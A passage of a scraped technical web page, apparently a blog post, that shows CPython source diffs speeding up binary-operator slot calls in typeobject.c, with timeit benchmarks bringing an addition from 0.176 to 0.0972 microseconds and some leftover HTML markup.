@@ -5624,20 +5631,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
if (do_other amp; amp; \
PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) amp; amp; \
method_is_overloaded(self, other, amp;rop_id)) { \
span class="hljs-deletion"- r = call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ r = call_maybe(other, amp;rop_id, self); \span
if (r != Py_NotImplemented) \
return r; \
Py_DECREF(r); \
do_other = 0; \
} \
span class="hljs-deletion"- r = call_maybe(self, amp;op_id, "(O)", other); \span
span class="hljs-addition"+ r = call_maybe(self, amp;op_id, other); \span
if (r != Py_NotImplemented || \
Py_TYPE(other) == Py_TYPE(self)) \
return r; \
Py_DECREF(r); \
} \
if (do_other) { \
span class="hljs-deletion"- return call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ return call_maybe(other, amp;rop_id, self); \span
} \
Py_RETURN_NOTIMPLEMENTED; \
}
code
This gives another nice little speedup; we're down from 0.176 usec to 0.155 usec:
code data-sourcepos="378:1-383:46"$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.155 usec per loop
code
Even better would be to also pull the fast_function trick that the interpreter does at step 17 in order to call a function without creating any argument tuples at all:
codediff --git a/Include/ceval.h b/Include/ceval.h
index 6811367..f0997ac 100644
span class="hljs-header"--- a/Include/ceval.hspan
span class="hljs-header"+++ b/Include/ceval.hspan
@@ -10,6 +10,9 @@ extern "C" {
PyAPI_FUNC(PyObject *) PyEval_CallObjectWithKeywords(
PyObject *, PyObject *, PyObject *);
span class="hljs-addition"+PyAPI_FUNC(PyObject *)span
span class="hljs-addition"+PyEval_FastFunction(PyObject *func, PyObject **stack, int n);span
span class="hljs-addition"+span
/* Inline this */
#define PyEval_CallObject(func,arg) \
PyEval_CallObjectWithKeywords(func, arg, (PyObject *)NULL)
diff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..6419ea2 100644
span class="hljs-header"--- a/Objects/typeobject.cspan
span class="hljs-header"+++ b/Objects/typeobject.cspan
@@ -1465,36 +1465,47 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
/* Clone of call_method() that returns NotImplemented when the lookup fails. */
static PyObject *
span class="hljs-deletion"-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)span
span class="hljs-addition"+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)span
{
span class="hljs-deletion"- va_list va;span
span class="hljs-deletion"- PyObject *args, *func = 0, *retval;span
span class="hljs-deletion"- va_start(va, format);span
span class="hljs-addition"+ PyObject *args[2], *func = 0, *retval;span
span class="hljs-addition"+ int na = 1;span
func = lookup_maybe(o, nameid);
if (func == NULL) {
span class="hljs-deletion"- va_end(va);span
if (!PyErr_Occurred())
Py_RETURN_NOTIMPLEMENTED;
return NULL;
}
span class="hljs-deletion"- if (format amp; amp; *format)span
span class="hljs-deletion"- args = Py_VaBuildValue(format, va);span
span class="hljs-deletion"- elsespan
span class="hljs-deletion"- args = PyTuple_New(0);span
span class="hljs-deletion"-span
span class="hljs-deletion"- va_end(va);span
span class="hljs-deletion"-span
span class="hljs-deletion"- if (args == NULL)span
span class="hljs-deletion"- return NULL;span
span class="hljs-addition"+ args[1] = p;span
span class="hljs-addition"+ if (PyMethod_Check(func) amp; amp; PyMethod_GET_SELF(func) != NULL) {span
span class="hljs-addition"+ PyObject *mself = PyMethod_GET_SELF(func);span
span class="hljs-addition"+ PyObject *mfunc = PyMethod_GET_FUNCTION(func);span
span class="hljs-addition"+ args[0] = mself;span
span class="hljs-addition"+ na = 2;span
span class="hljs-addition"+ Py_INCREF(mfunc);span
span class="hljs-addition"+ Py_DECREF(func);span
span class="hljs-addition"+ func = mfunc;span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ args[0] = NULL;span
span class="hljs-addition"+ }span
span class="hljs-deletion"- assert(PyTuple_Check(args));span
span class="hljs-deletion"- retval = PyObject_Call(func, args, NULL);span
span class="hljs-addition"+ if (PyFunction_Check(func)) {span
span class="hljs-addition"+ retval = PyEval_FastFunction(func, amp;args[2], na);span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ PyObject* tuple = PyTuple_New(na);span
span class="hljs-addition"+ if (tuple == NULL) {span
span class="hljs-addition"+ retval = NULL;span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ memcpy(((PyTupleObject *)tuple)- gt;ob_item, args, sizeof(PyObject*) * na);span
span class="hljs-addition"+ Py_XINCREF(args[0]);span
span class="hljs-addition"+ Py_XINCREF(args[1]);span
span class="hljs-addition"+ retval = PyObject_Call(func, tuple, NULL);span
span class="hljs-addition"+ Py_DECREF(tuple);span
span class="hljs-addition"+ }span
span class="hljs-addition"+ }span
span class="hljs-deletion"- Py_DECREF(args);span
Py_DECREF(func);
span class="hljs-deletion"-span
return retval;
}
@@ -5624,20 +5635,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
if (do_other amp; amp; \
PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) amp; amp; \
method_is_overloaded(self, other, amp;rop_id)) { \
span class="hljs-deletion"- r = call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ r = call_maybe(other, amp;rop_id, self); \span
if (r != Py_NotImplemented) \
return r; \
Py_DECREF(r); \
do_other = 0; \
} \
span class="hljs-deletion"- r = call_maybe(self, amp;op_id, "(O)", other); \span
span class="hljs-addition"+ r = call_maybe(self, amp;op_id, other); \span
if (r != Py_NotImplemented || \
Py_TYPE(other) == Py_TYPE(self)) \
return r; \
Py_DECREF(r); \
} \
if (do_other) { \
span class="hljs-deletion"- return call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ return call_maybe(other, amp;rop_id, self); \span
} \
Py_RETURN_NOTIMPLEMENTED; \
}
diff --git a/Python/ceval.c b/Python/ceval.c
index 2f3d3ad..bf6aedc 100644
span class="hljs-header"--- a/Python/ceval.cspan
span class="hljs-header"+++ b/Python/ceval.cspan
@@ -4329,6 +4329,12 @@ call_function(PyObject ***pp_stack, int oparg
return x;
}
span class="hljs-addition"+PyAPI_FUNC(PyObject *)span
span class="hljs-addition"+PyEval_FastFunction(PyObject *func, PyObject **stack, int n)span
span class="hljs-addition"+{span
span class="hljs-addition"+ return fast_function(func, amp;stack, n, n, 0);span
span class="hljs-addition"+}span
span class="hljs-addition"+span
/* The fast_function() function optimize calls for which no argument
tuple is necessary; the objects are passed directly from the stack.
For the simplest case -- a function that takes only positional
code
And with that, we're down from 0.155 usec to 0.113 usec:
code data-sourcepos="515:1-520:46"$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.113 usec per loop
code
So, it seems that slots aren't intrinsically slow. Provided that the implementation of slots in typeobject.c is taught to use the exact same tricks that the interpreter does, then they are the exact same speed as non-slots. We could even go further and elide construction of the method object entirely:
codediff --git a/Include/ceval.h b/Include/ceval.h
index 6811367..f0997ac 100644
span class="hljs-header"--- a/Include/ceval.hspan
span class="hljs-header"+++ b/Include/ceval.hspan
@@ -10,6 +10,9 @@ extern "C" {
PyAPI_FUNC(PyObject *) PyEval_CallObjectWithKeywords(
PyObject *, PyObject *, PyObject *);
span class="hljs-addition"+PyAPI_FUNC(PyObject *)span
span class="hljs-addition"+PyEval_FastFunction(PyObject *func, PyObject **stack, int n);span
span class="hljs-addition"+span
/* Inline this */
#define PyEval_CallObject(func,arg) \
PyEval_CallObjectWithKeywords(func, arg, (PyObject *)NULL)
diff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..c4ffa70 100644
span class="hljs-header"--- a/Objects/typeobject.cspan
span class="hljs-header"+++ b/Objects/typeobject.cspan
@@ -1465,36 +1465,64 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
/* Clone of call_method() that returns NotImplemented when the lookup fails. */
static PyObject *
span class="hljs-deletion"-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)span
span class="hljs-addition"+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)span
{
span class="hljs-deletion"- va_list va;span
span class="hljs-deletion"- PyObject *args, *func = 0, *retval;span
span class="hljs-deletion"- va_start(va, format);span
span class="hljs-addition"+ PyObject *args[2], *func = 0, *retval;span
span class="hljs-addition"+ int na = 2;span
span class="hljs-deletion"- func = lookup_maybe(o, nameid);span
span class="hljs-addition"+ args[1] = p;span
span class="hljs-addition"+ func = _PyType_LookupId(Py_TYPE(o), nameid);span
if (func == NULL) {
span class="hljs-deletion"- va_end(va);span
if (!PyErr_Occurred())
Py_RETURN_NOTIMPLEMENTED;
return NULL;
}
span class="hljs-addition"+ if (PyFunction_Check(func)) {span
span class="hljs-addition"+ Py_INCREF(func);span
span class="hljs-addition"+ args[0] = o;span
span class="hljs-addition"+ retval = PyEval_FastFunction(func, amp;args[2], na);span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ descrgetfunc f = Py_TYPE(func)- gt;tp_descr_get;span
span class="hljs-addition"+ if (f == NULL) {span
span class="hljs-addition"+ Py_INCREF(func);span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ func = f(func, o, (PyObject *)(Py_TYPE(o)));span
span class="hljs-addition"+ if (func == NULL) {span
span class="hljs-addition"+ if (!PyErr_Occurred())span
span class="hljs-addition"+ Py_RETURN_NOTIMPLEMENTED;span
span class="hljs-addition"+ return NULL;span
span class="hljs-addition"+ }span
span class="hljs-addition"+ }span
span class="hljs-deletion"- if (format amp; amp; *format)span
span class="hljs-deletion"- args = Py_VaBuildValue(format, va);span
span class="hljs-deletion"- elsespan
span class="hljs-deletion"- args = PyTuple_New(0);span
span class="hljs-deletion"-span
span class="hljs-deletion"- va_end(va);span
span class="hljs-deletion"-span
span class="hljs-deletion"- if (args == NULL)span
span class="hljs-deletion"- return NULL;span
span class="hljs-deletion"-span
span class="hljs-deletion"- assert(PyTuple_Check(args));span
span class="hljs-deletion"- retval = PyObject_Call(func, args, NULL);span
span class="hljs-addition"+ if (PyMethod_Check(func) amp; amp; PyMethod_GET_SELF(func) != NULL) {span
span class="hljs-addition"+ PyObject *mself = PyMethod_GET_SELF(func);span
span class="hljs-addition"+ PyObject *mfunc = PyMethod_GET_FUNCTION(func);span
span class="hljs-addition"+ args[0] = mself;span
span class="hljs-addition"+ Py_INCREF(mfunc);span
span class="hljs-addition"+ Py_DECREF(func);span
span class="hljs-addition"+ func = mfunc;span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ args[0] = NULL;span
span class="hljs-addition"+ na = 1;span
span class="hljs-addition"+ }span
span class="hljs-addition"+ span
span class="hljs-addition"+ if (PyFunction_Check(func)) {span
span class="hljs-addition"+ retval = PyEval_FastFunction(func, amp;args[2], na);span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ PyObject* tuple = PyTuple_New(na);span
span class="hljs-addition"+ if (tuple == NULL) {span
span class="hljs-addition"+ retval = NULL;span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ memcpy(((PyTupleObject *)tuple)- gt;ob_item, args, sizeof(PyObject*) * na);span
span class="hljs-addition"+ Py_XINCREF(args[0]);span
span class="hljs-addition"+ Py_XINCREF(args[1]);span
span class="hljs-addition"+ retval = PyObject_Call(func, tuple, NULL);span
span class="hljs-addition"+ Py_DECREF(tuple);span
span class="hljs-addition"+ }span
span class="hljs-addition"+ }span
span class="hljs-addition"+ }span
span class="hljs-deletion"- Py_DECREF(args);span
Py_DECREF(func);
span class="hljs-deletion"-span
return retval;
}
@@ -5624,20 +5652,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
if (do_other amp; amp; \
PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) amp; amp; \
method_is_overloaded(self, other, amp;rop_id)) { \
span class="hljs-deletion"- r = call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ r = call_maybe(other, amp;rop_id, self); \span
if (r != Py_NotImplemented) \
return r; \
Py_DECREF(r); \
do_other = 0; \
} \
span class="hljs-deletion"- r = call_maybe(self, amp;op_id, "(O)", other); \span
span class="hljs-addition"+ r = call_maybe(self, amp;op_id, other); \span
if (r != Py_NotImplemented || \
Py_TYPE(other) == Py_TYPE(self)) \
return r; \
Py_DECREF(r); \
} \
if (do_other) { \
span class="hljs-deletion"- return call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ return call_maybe(other, amp;rop_id, self); \span
} \
Py_RETURN_NOTIMPLEMENTED; \
}
diff --git a/Python/ceval.c b/Python/ceval.c
index 2f3d3ad..bf6aedc 100644
span class="hljs-header"--- a/Python/ceval.cspan
span class="hljs-header"+++ b/Python/ceval.cspan
@@ -4329,6 +4329,12 @@ call_function(PyObject ***pp_stack, int oparg
return x;
}
span class="hljs-addition"+PyAPI_FUNC(PyObject *)span
span class="hljs-addition"+PyEval_FastFunction(PyObject *func, PyObject **stack, int n)span
span class="hljs-addition"+{span
span class="hljs-addition"+ return fast_function(func, amp;stack, n, n, 0);span
span class="hljs-addition"+}span
span class="hljs-addition"+span
/* The fast_function() function optimize calls for which no argument
tuple is necessary; the objects are passed directly from the stack.
For the simplest case -- a function that takes only positional
code
With this extra optimisation, we're down from 0.113 usec to 0.0972 usec:
code data-sourcepos="672:1-677:47"$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.0972 usec per loop
code
In conclusion, slots don't need to be slow - the above diff makes them fast (at least for some binary operators; applying similar transformations to other slots is left as an exercise to the reader).
codepage: a1a a href="/content/page2"2a a href="/content/page3"3acode

Updated Time

Updating   
Friend links: ProxyFire    More...
Site Map 1 2 3 4 5 6 7 8 9 10 20 30 40 50 60 70 80 90 100 110 120 130 140 150 160 170 180 190 200 250 300 350 400 450 500 550 600 610 620 630 640 650 660 670 680 690 700 710 720 730 740 750
TOS | Contact us
© 2009 MyIP.cn Dev by MYIP Elapsed:61.957ms